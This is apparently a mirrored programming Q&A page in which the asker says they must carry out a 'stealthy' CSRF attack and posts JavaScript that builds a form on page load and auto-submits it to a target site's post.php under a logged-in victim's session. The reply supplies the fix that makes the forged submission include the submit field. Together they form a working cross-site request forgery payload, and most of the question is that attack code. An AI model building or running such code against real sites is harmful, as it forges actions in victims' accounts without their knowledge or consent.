douxie0824 2014-11-21 03:17
浏览 37

无法在使用Java Script创建的表单中设置提交类型输入

I am working on a project where I have to carryout CSRF on a web page. So when the user is logged in and when he clicks on my webpage, I have to post with his username(derived from the cookie) .

I tried creating my own form using the following code , So that when the user clicks my webpage, this form will post into post.php(target webpage)

<html>
<script language="javascript">

  function blah() {
    alert();
  var theForm, newInput1, newInput2, newInput3;
  var bla = "Aaada";
  var bla2 ="POST";
  // Start by creating a <form>
  theForm = document.createElement("form");
  theForm.action = "http://targeturl/post.php";
  theForm.method = "post";

  newInput1 = document.createElement("input");
  newInput1.type = "text";
  newInput1.name = "username";
  newInput1.value = bla;

  newInput2 = document.createElement("textarea");
  newInput2.name = "message";
  newInput2.value = bla;
    newInput2.id = "message";

  newInput3 = document.createElement("input");
  newInput3.type = "submit";
  newInput3.name = "post_submit";
  newInput3.value = bla2;
  newInput3.id = "post_submit";

  theForm.appendChild(newInput3);
  theForm.appendChild(newInput2);
  theForm.appendChild(newInput1); 
  theForm.submit();

  }
  blah();
</script>
</html>

Title, Message and Submit button are the three inputs in the target form. When I try running this form, the submit button alone is not set. I am not able to understand why. I tried an actual form in html (with ) and posted it to the target URL, it works .

But since I have to be stealthy, I have to manually build the form , like the code I have posted. I tried all posssibilites and I am not able to nail the actual reason why this variable is not setting.

PS:

 if (isset($_POST['post_submit'])) {

is the check in target page

and below id the target form :

<form method="post" action="post.php">
            Title: <input type="text" name="title" maxlength="50"/>
            <br />
            <br />
            Posting:
            <br />
            <br />
            <textarea name="message" cols="120" rows="10" id="message"></textarea>
            <br />
            <br />
            <input name="post_submit" type="submit" id="post_submit" value="POST" />
            </form>

(It posts to itself, I have not included the remaining code of target)

Any help would be appreciated Thanks

  • 写回答

2条回答 默认 最新

  • doujiaoang69440 2014-11-21 03:30
    关注

    If you trigger the click event instead of the submit event, you'll get the submit button as well, so replace

    theForm.submit();

    with

    newInput3.click();
    评论

报告相同问题?

悬赏问题

  • ¥15 nginx中的CORS策略应该如何配置
  • ¥30 信号与系统实验:采样定理分析
  • ¥100 我想找人帮我写Python 的股票分析代码,有意请加mathtao
  • ¥20 Vite 打包的 Vue3 组件库,图标无法显示
  • ¥15 php 同步电商平台多个店铺增量订单和订单状态
  • ¥15 关于logstash转发日志时发生的部分内容丢失问题
  • ¥17 pro*C预编译“闪回查询”报错SCN不能识别
  • ¥15 微信会员卡接入微信支付商户号收款
  • ¥15 如何获取烟草零售终端数据
  • ¥15 数学建模招标中位数问题